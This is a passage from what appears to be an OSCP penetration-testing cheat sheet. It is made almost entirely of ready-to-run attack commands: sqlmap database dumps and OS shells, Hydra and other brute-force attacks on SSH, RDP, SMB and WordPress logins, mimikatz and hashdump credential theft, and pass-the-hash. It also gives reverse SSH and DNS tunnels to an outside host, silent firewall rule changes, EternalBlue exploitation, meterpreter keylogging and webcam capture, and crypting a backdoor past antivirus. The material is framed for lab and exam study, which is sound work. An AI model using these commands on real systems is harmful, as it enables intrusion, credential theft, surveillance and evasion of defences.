http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all` 1972 | 1973 | - SQL Map OS Shell 1974 | 1975 | `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell ` 1976 | 1977 | `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell` 1978 | 1979 | - Automated sqlmap scan 1980 | 1981 | `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"` 1982 | 1983 | - Targeted sqlmap scan 1984 | 1985 | `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump` 1986 | 1987 | - Scan url for union + error based injection with mysql backend and use a random user agent + database dump 1988 | 1989 | `sqlmap -o -u http://$ip/index.php --forms --dbs ` 1990 | 1991 | `sqlmap -o -u "http://$ip/form/" --forms` 1992 | 1993 | - Sqlmap check form for injection 1994 | 1995 | `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump` 1996 | 1997 | - Enumerate databases 1998 | 1999 | `sqlmap --dbms=mysql -u "$URL" --dbs` 2000 | 2001 | - Enumerate tables from a specific database 2002 | 2003 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables ` 2004 | 2005 | - Dump table data from a specific database and table 2006 | 2007 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump ` 2008 | 2009 | - Specify parameter to exploit 2010 | 2011 | `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2 ` 2012 | 2013 | - Specify parameter to exploit in 'nice' URIs (exploits param1) 2014 | 2015 | `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs ` 2016 | 2017 | - Get OS shell 2018 | 2019 | `sqlmap --dbms=mysql -u "$URL" --os-shell` 2020 | 2021 | - Get SQL shell 2022 | 2023 | `sqlmap --dbms=mysql -u "$URL" --sql-shell` 2024 | 2025 | - SQL query 2026 | 2027 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"` 2028 | 2029 | - Use Tor Socks5 proxy 2030 | 2031 | `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs` 2032 | 2033 | 2034 | - **NoSQLMap Examples** 2035 | You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQLDatabase enumeration. 2036 | 2037 | - NoSQLMap Installation 2038 | 2039 | ```bash 2040 | git clone https://github.com/codingo/NoSQLMap.git 2041 | cd NoSQLMap/ 2042 | ls 2043 | pip install couchdb 2044 | pip install pbkdf2 2045 | pip install ipcalc 2046 | python nosqlmap.py 2047 | ``` 2048 | 2049 | 2050 | - Often you can create an exception dump message with MongoDB using a malformed NoSQLQuery such as: 2051 | 2052 | `a'; return this.a != 'BadData’'; var dummy='!` 2053 | 2054 | 2055 | 2056 | - Password Attacks 2057 | -------------------------------------------------------------------------------------------------------------- 2058 | 2059 | - AES Decryption 2060 | http://aesencryption.net/ 2061 | 2062 | - Convert multiple webpages into a word list 2063 | ```bash 2064 | for x in 'index' 'about' 'post' 'contact' ; do \ 2065 | curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \ 2066 | done 2067 | ``` 2068 | 2069 | - Or convert html to word list dict 2070 | `html2dic index.html.out | sort -u > index-html.dict` 2071 | 2072 | - Default Usernames and Passwords 2073 | 2074 | - CIRT 2075 | [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords) 2076 | 2077 | - Government Security - Default Logins and Passwords for 2078 | Networked Devices 2079 | 2080 | - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php) 2081 | 2082 | - Virus.org 2083 | [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/) 2084 | 2085 | - Default Password 2086 | [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/) 2087 | 2088 | - Brute Force 2089 | 2090 | - Nmap Brute forcing Scripts 2091 | [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html) 2092 | 2093 | - Nmap Generic auto detect brute force attack: 2094 | `nmap --script brute -Pn ` 2095 | 2096 | - MySQL nmap brute force attack: 2097 | `nmap --script=mysql-brute $ip` 2098 | 2099 | - Dictionary Files 2100 | 2101 | - Word lists on Kali 2102 | `cd /usr/share/wordlists` 2103 | 2104 | - Key-space Brute Force 2105 | 2106 | - `crunch 6 6 0123456789ABCDEF -o crunch1.txt` 2107 | 2108 | - `crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha` 2109 | 2110 | - `crunch 8 8 -t ,@@^^%%%` 2111 | 2112 | - Pwdump and Fgdump - Security Accounts Manager (SAM) 2113 | 2114 | - `pwdump.exe` - attempts to extract password hashes 2115 | 2116 | - `fgdump.exe` - attempts to kill local antiviruses before 2117 | attempting to dump the password hashes and 2118 | cached credentials. 2119 | 2120 | - Windows Credential Editor (WCE) 2121 | 2122 | - allows one to perform several attacks to obtain clear text 2123 | passwords and hashes. Usage: `wce -w` 2124 | 2125 | - Mimikatz 2126 | 2127 | - extract plaintexts passwords, hash, PIN code and kerberos 2128 | tickets from memory. mimikatz can also perform 2129 | pass-the-hash, pass-the-ticket or build Golden tickets 2130 | [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz) 2131 | From metasploit meterpreter (must have System level access): 2132 | ``` 2133 | meterpreter> load mimikatz 2134 | meterpreter> help mimikatz 2135 | meterpreter> msv 2136 | meterpreter> kerberos 2137 | meterpreter> mimikatz_command -f samdump::hashes 2138 | meterpreter> mimikatz_command -f sekurlsa::searchPasswords 2139 | ``` 2140 | 2141 | - Password Profiling 2142 | 2143 | - cewl can generate a password list from a web page 2144 | `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt` 2145 | 2146 | - Password Mutating 2147 | 2148 | - John the ripper can mutate password lists 2149 | nano /etc/john/john.conf 2150 | `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt` 2151 | 2152 | - Medusa 2153 | 2154 | - Medusa, initiated against an htaccess protected web 2155 | directory 2156 | `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10` 2157 | 2158 | - Ncrack 2159 | 2160 | - ncrack (from the makers of nmap) can brute force RDP 2161 | `ncrack -vv --user offsec -P password-file.txt rdp://$ip` 2162 | 2163 | - Hydra 2164 | 2165 | - Hydra brute force against SNMP 2166 | 2167 | `hydra -P password-file.txt -v $ip snmp` 2168 | 2169 | - Hydra FTP known user and rockyou password list 2170 | 2171 | `hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp` 2172 | 2173 | - Hydra SSH using list of users and passwords 2174 | 2175 | `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh` 2176 | 2177 | - Hydra SSH using a known password and a username list 2178 | 2179 | `hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh` 2180 | 2181 | - Hydra SSH Against Known username on port 22 2182 | 2183 | `hydra $ip -s 22 ssh -l -P big_wordlist.txt` 2184 | 2185 | - Hydra POP3 Brute Force 2186 | 2187 | `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V` 2188 | 2189 | - Hydra SMTP Brute Force 2190 | 2191 | `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V` 2192 | 2193 | - Hydra attack http get 401 login with a dictionary 2194 | 2195 | `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin` 2196 | 2197 | - Hydra attack Windows Remote Desktop with rockyou 2198 | 2199 | `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip` 2200 | 2201 | - Hydra brute force SMB user with rockyou: 2202 | 2203 | `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb` 2204 | 2205 | - Hydra brute force a Wordpress admin login 2206 | 2207 | `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` 2208 | 2209 | 2210 | 2211 | - Password Hash Attacks 2212 | ------------------------------------------------------------------------------------------------------------------- 2213 | 2214 | - Online Password Cracking 2215 | [*https://crackstation.net/*](https://crackstation.net/) 2216 | [*http://finder.insidepro.com/*](http://finder.insidepro.com/) 2217 | 2218 | - Hashcat 2219 | Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter. 2220 | 2221 | `apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev` 2222 | 2223 | and 2224 | 2225 | `apt-get install pocl-opencl-icd` 2226 | 2227 | 2228 | Cracking Linux Hashes - /etc/shadow file 2229 | ``` 2230 | 500 | md5crypt $1$, MD5(Unix) | Operating-Systems 2231 | 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 2232 | 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 2233 | 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems 2234 | ``` 2235 | Cracking Windows Hashes 2236 | ``` 2237 | 3000 | LM | Operating-Systems 2238 | 1000 | NTLM | Operating-Systems 2239 | ``` 2240 | Cracking Common Application Hashes 2241 | ``` 2242 | 900 | MD4 | Raw Hash 2243 | 0 | MD5 | Raw Hash 2244 | 5100 | Half MD5 | Raw Hash 2245 | 100 | SHA1 | Raw Hash 2246 | 10800 | SHA-384 | Raw Hash 2247 | 1400 | SHA-256 | Raw Hash 2248 | 1700 | SHA-512 | Raw Hash 2249 | ``` 2250 | 2251 | Create a .hash file with all the hashes you want to crack 2252 | puthasheshere.hash: 2253 | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` 2254 | 2255 | Hashcat example cracking Linux md5crypt passwords $1$ using rockyou: 2256 | 2257 | `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt` 2258 | 2259 | Wordpress sample hash: `$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/` 2260 | 2261 | Wordpress clear text: `test` 2262 | 2263 | Hashcat example cracking Wordpress passwords using rockyou: 2264 | 2265 | `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt` 2266 | 2267 | - Sample Hashes 2268 | [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes) 2269 | 2270 | - Identify Hashes 2271 | 2272 | `hash-identifier` 2273 | 2274 | - To crack linux hashes you must first unshadow them: 2275 | 2276 | `unshadow passwd-file.txt shadow-file.txt` 2277 | 2278 | `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt` 2279 | 2280 | - John the Ripper - Password Hash Cracking 2281 | 2282 | - `john $ip.pwdump` 2283 | 2284 | - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes` 2285 | 2286 | - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt` 2287 | 2288 | - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt` 2289 | 2290 | - JTR forced descrypt cracking with wordlist 2291 | 2292 | `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt` 2293 | 2294 | - JTR forced descrypt brute force cracking 2295 | 2296 | `john --format=descrypt hash --show` 2297 | 2298 | - Passing the Hash in Windows 2299 | 2300 | - Use Metasploit to exploit one of the SMB servers in the labs. 2301 | Dump the password hashes and attempt a pass-the-hash attack 2302 | against another system: 2303 | 2304 | `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 ` 2305 | 2306 | `pth-winexe -U administrator //$ip cmd` 2307 | 2308 | Networking, Pivoting and Tunneling 2309 | ================================================================================================================================ 2310 | 2311 | - Port Forwarding - accept traffic on a given IP address and port and 2312 | redirect it to a different IP address and port 2313 | 2314 | - `apt-get install rinetd` 2315 | 2316 | - `cat /etc/rinetd.conf` 2317 | 2318 | ``` 2319 | # bindadress bindport connectaddress connectport 2320 | w.x.y.z 53 a.b.c.d 80 2321 | ``` 2322 | 2323 | - SSH Local Port Forwarding: supports bi-directional communication 2324 | channels 2325 | 2326 | - `ssh -L ::` 2327 | 2328 | - SSH Remote Port Forwarding: Suitable for popping a remote shell on 2329 | an internal non routable network 2330 | 2331 | - `ssh -R ::` 2332 | 2333 | - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local 2334 | attacking box to tunnel ALL incoming traffic to ANY host in the DMZ 2335 | network on ANY PORT 2336 | 2337 | - `ssh -D -p ` 2338 | 2339 | - Proxychains - Perform nmap scan within a DMZ from an external 2340 | computer 2341 | 2342 | - Create reverse SSH tunnel from Popped machine on :2222 2343 | 2344 | `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com` 2345 | `ssh -f -N -R 2222::22 root@` 2346 | 2347 | - Create a Dynamic application-level port forward on 8080 thru 2348 | 2222 2349 | 2350 | `ssh -f -N -D :8080 -p 2222 hax0r@` 2351 | 2352 | - Leverage the SSH SOCKS server to perform Nmap scan on network 2353 | using proxy chains 2354 | 2355 | `proxychains nmap --top-ports=20 -sT -Pn $ip/24` 2356 | 2357 | - HTTP Tunneling 2358 | 2359 | `nc -vvn $ip 8888` 2360 | 2361 | - Traffic Encapsulation - Bypassing deep packet inspection 2362 | 2363 | - http tunnel 2364 | On server side: 2365 | `sudo hts -F : 80 ` 2366 | On client side: 2367 | `sudo htc -P -F :80 stunnel` 2368 | 2369 | - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your 2370 | network 2371 | 2372 | - Tunnel on port 22 2373 | 2374 | `plink -l root -pw pass -R 3389::3389 ` 2375 | 2376 | - Port 22 blocked? Try port 80? or 443? 2377 | 2378 | `plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P80` 2379 | 2380 | - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel 2381 | (bypass deep packet inspection) 2382 | 2383 | - Windows machine add required firewall rules without prompting the user 2384 | 2385 | - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes` 2386 | 2387 | - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000` 2388 | 2389 | - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080` 2390 | 2391 | - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079` 2392 | 2393 | - Start the http tunnel client 2394 | 2395 | `httptunnel_client.exe` 2396 | 2397 | - Create HTTP reverse shell by connecting to localhost port 3000 2398 | 2399 | `plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P 3000` 2400 | 2401 | - VLAN Hopping 2402 | 2403 | - ```bash 2404 | git clone https://github.com/nccgroup/vlan-hopping.git 2405 | chmod 700 frogger.sh 2406 | ./frogger.sh 2407 | ``` 2408 | 2409 | 2410 | - VPN Hacking 2411 | 2412 | - Identify VPN servers: 2413 | `./udp-protocol-scanner.pl -p ike $ip` 2414 | 2415 | - Scan a range for VPN servers: 2416 | `./udp-protocol-scanner.pl -p ike -f ip.txt` 2417 | 2418 | - Use IKEForce to enumerate or dictionary attack VPN servers: 2419 | 2420 | `pip install pyip` 2421 | 2422 | `git clone https://github.com/SpiderLabs/ikeforce.git ` 2423 | 2424 | Perform IKE VPN enumeration with IKEForce: 2425 | 2426 | `./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic ` 2427 | 2428 | Bruteforce IKE VPN using IKEForce: 2429 | 2430 | `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 ` 2431 | Use ike-scan to capture the PSK hash: 2432 | 2433 | ```bash 2434 | ike-scan 2435 | ike-scan TARGET-IP 2436 | ike-scan -A TARGET-IP 2437 | ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key 2438 | ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP 2439 | ``` 2440 | Use psk-crack to crack the PSK hash 2441 | 2442 | ```bash 2443 | psk-crack hash-file.txt 2444 | pskcrack 2445 | psk-crack -b 5 TARGET-IPkey 2446 | psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 2447 | psk-crack -d /path/to/dictionary-file TARGET-IP-key 2448 | ``` 2449 | 2450 | - PPTP Hacking 2451 | 2452 | - Identifying PPTP, it listens on TCP: 1723 2453 | NMAP PPTP Fingerprint: 2454 | 2455 | `nmap –Pn -sV -p 1723 TARGET(S) ` 2456 | PPTP Dictionary Attack 2457 | 2458 | `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst` 2459 | 2460 | - Port Forwarding/Redirection 2461 | 2462 | - PuTTY Link tunnel - SSH Tunneling 2463 | 2464 | - Forward remote port to local address: 2465 | 2466 | `plink.exe -P 22 -l root -pw "1337" -R 445::445 ` 2467 | 2468 | - SSH Pivoting 2469 | 2470 | - SSH pivoting from one network to another: 2471 | 2472 | `ssh -D :1010 -p 22 user@` 2473 | 2474 | - DNS Tunneling 2475 | 2476 | - dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine. 2477 | 2478 | - Attacking Machine Installation: 2479 | 2480 | ```bash 2481 | apt-get update 2482 | apt-get -y install ruby-dev git make g++ 2483 | gem install bundler 2484 | git clone https://github.com/iagox86/dnscat2.git 2485 | cd dnscat2/server 2486 | bundle install 2487 | ``` 2488 | 2489 | - Run dnscat2: 2490 | 2491 | ``` 2492 | ruby ./dnscat2.rb 2493 | dnscat2> New session established: 1422 2494 | dnscat2> session -i 1422 2495 | ``` 2496 | 2497 | - Target Machine: 2498 | [*https://downloads.skullsecurity.org/dnscat2/*](https://downloads.skullsecurity.org/dnscat2/) 2499 | 2500 | [*https://github.com/lukebaggett/dnscat2-powershell/*](https://github.com/lukebaggett/dnscat2-powershell/) 2501 | 2502 | `dnscat --host ` 2503 | 2504 | The Metasploit Framework 2505 | ====================================================================================================================== 2506 | 2507 | - See [*Metasploit Unleashed 2508 | Course*](https://www.offensive-security.com/metasploit-unleashed/) 2509 | in the Essentials 2510 | 2511 | - Search for exploits using Metasploit GitHub framework source code: 2512 | [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework) 2513 | Translate them for use on OSCP LAB or EXAM. 2514 | 2515 | - Metasploit 2516 | 2517 | - MetaSploit requires Postfresql 2518 | 2519 | `systemctl start postgresql` 2520 | 2521 | - To enable Postgresql on startup 2522 | 2523 | `systemctl enable postgresql` 2524 | 2525 | - MSF Syntax 2526 | 2527 | - Start metasploit 2528 | 2529 | `msfconsole ` 2530 | 2531 | `msfconsole -q` 2532 | 2533 | - Show help for command 2534 | 2535 | `show -h` 2536 | 2537 | - Show Auxiliary modules 2538 | 2539 | `show auxiliary` 2540 | 2541 | - Use a module 2542 | 2543 | ``` 2544 | use auxiliary/scanner/snmp/snmp_enum 2545 | use auxiliary/scanner/http/webdav_scanner 2546 | use auxiliary/scanner/smb/smb_version 2547 | use auxiliary/scanner/ftp/ftp_login 2548 | use exploit/windows/pop3/seattlelab_pass 2549 | ``` 2550 | 2551 | - Show the basic information for a module 2552 | 2553 | `info` 2554 | 2555 | - Show the configuration parameters for a module 2556 | 2557 | `show options` 2558 | 2559 | - Set options for a module 2560 | 2561 | ``` 2562 | set RHOSTS 192.168.1.1-254 2563 | set THREADS 10 2564 | ``` 2565 | 2566 | - Run the module 2567 | 2568 | `run` 2569 | 2570 | - Execute an Exploit 2571 | 2572 | `exploit` 2573 | 2574 | - Search for a module 2575 | 2576 | `search type:auxiliary login` 2577 | 2578 | - Metasploit Database Access 2579 | 2580 | - Show all hosts discovered in the MSF database 2581 | 2582 | `hosts` 2583 | 2584 | - Scan for hosts and store them in the MSF database 2585 | 2586 | `db_nmap` 2587 | 2588 | - Search machines for specific ports in MSF database 2589 | 2590 | `services -p 443` 2591 | 2592 | - Leverage MSF database to scan SMB ports (auto-completed rhosts) 2593 | 2594 | `services -p 443 --rhosts` 2595 | 2596 | - Staged and Non-staged 2597 | 2598 | - Non-staged payload - is a payload that is sent in its entirety in one go 2599 | 2600 | - Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus 2601 | 2602 | - MS 17-010 - EternalBlue 2603 | 2604 | - You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: [*https://www.youtube.com/watch?v=4OHLor9VaRI*](https://www.youtube.com/watch?v=4OHLor9VaRI) 2605 | 2606 | 2607 | 1. First step is to configure the Kali to work with wine 32bit 2608 | 2609 | dpkg --add-architecture i386 && apt-get update && apt-get install wine32 2610 | rm -r ~/.wine 2611 | wine cmd.exe 2612 | exit 2613 | 2614 | 2. Download the exploit repostory `https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit` 2615 | 2616 | 3. Move the exploit to `/usr/share/metasploit-framework/modules/exploits/windows/smb` or `~/.msf4/modules/exploits/windows/smb` 2617 | 2618 | 4. Start metasploit console 2619 | 2620 | 2621 | - I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes. 2622 | 2623 | ``` 2624 | use exploit/windows/smb/eternalblue_doublepulsar 2625 | msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 2626 | RHOST => 10.10.10.10 2627 | msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe 2628 | PROCESSINJECT => spoolsv.exe 2629 | msf exploit(eternalblue_doublepulsar) > run 2630 | ``` 2631 | 2632 | 2633 | - Experimenting with Meterpreter 2634 | 2635 | - Get system information from Meterpreter Shell 2636 | 2637 | `sysinfo` 2638 | 2639 | - Get user id from Meterpreter Shell 2640 | 2641 | `getuid` 2642 | 2643 | - Search for a file 2644 | 2645 | `search -f *pass*.txt` 2646 | 2647 | - Upload a file 2648 | 2649 | `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec` 2650 | 2651 | - Download a file 2652 | 2653 | `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe` 2654 | 2655 | - Invoke a command shell from Meterpreter Shell 2656 | 2657 | `shell` 2658 | 2659 | - Exit the meterpreter shell 2660 | 2661 | `exit` 2662 | 2663 | - Metasploit Exploit Multi Handler 2664 | 2665 | - multi/handler to accept an incoming reverse\_https\_meterpreter 2666 | 2667 | ``` 2668 | payload 2669 | use exploit/multi/handler 2670 | set PAYLOAD windows/meterpreter/reverse_https 2671 | set LHOST $ip 2672 | set LPORT 443 2673 | exploit 2674 | [*] Started HTTPS reverse handler on https://$ip:443/ 2675 | ``` 2676 | 2677 | - Building Your Own MSF Module 2678 | 2679 | - 2680 | ```bash 2681 | mkdir -p ~/.msf4/modules/exploits/linux/misc 2682 | cd ~/.msf4/modules/exploits/linux/misc 2683 | cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb 2684 | nano crossfire.rb 2685 | ``` 2686 | 2687 | 2688 | - Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities) 2689 | 2690 | - `download` Download a file or directory 2691 | `upload` Upload a file or directory 2692 | `portfwd` Forward a local port to a remote service 2693 | `route` View and modify the routing table 2694 | `keyscan_start` Start capturing keystrokes 2695 | `keyscan_stop` Stop capturing keystrokes 2696 | `screenshot` Grab a screenshot of the interactive desktop 2697 | `record_mic` Record audio from the default microphone for X seconds 2698 | `webcam_snap` Take a snapshot from the specified webcam 2699 | `getsystem` Attempt to elevate your privilege to that of local system. 2700 | `hashdump` Dumps the contents of the SAM database 2701 | 2702 | - Meterpreter Post Exploitation Features 2703 | 2704 | - Create a Meterpreter background session 2705 | 2706 | `background` 2707 | 2708 | Bypassing Antivirus Software 2709 | =========================================================================================================================== 2710 | 2711 | - Crypting Known Malware with Software Protectors 2712 | 2713 | - One such open source crypter, called Hyperion 2714 | 2715 | ```bash 2716 | cp /usr/share/windows-binaries/Hyperion-1.0.zip 2717 | unzip Hyperion-1.0.zip 2718 | cd Hyperion-1.0/ 2719 | i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe 2720 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll . 2721 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll . 2722 | wine hyperion.exe ../backdoor.exe ../crypted.exe 2723 | ``` 2724 | --------------------------------------------------------------------------------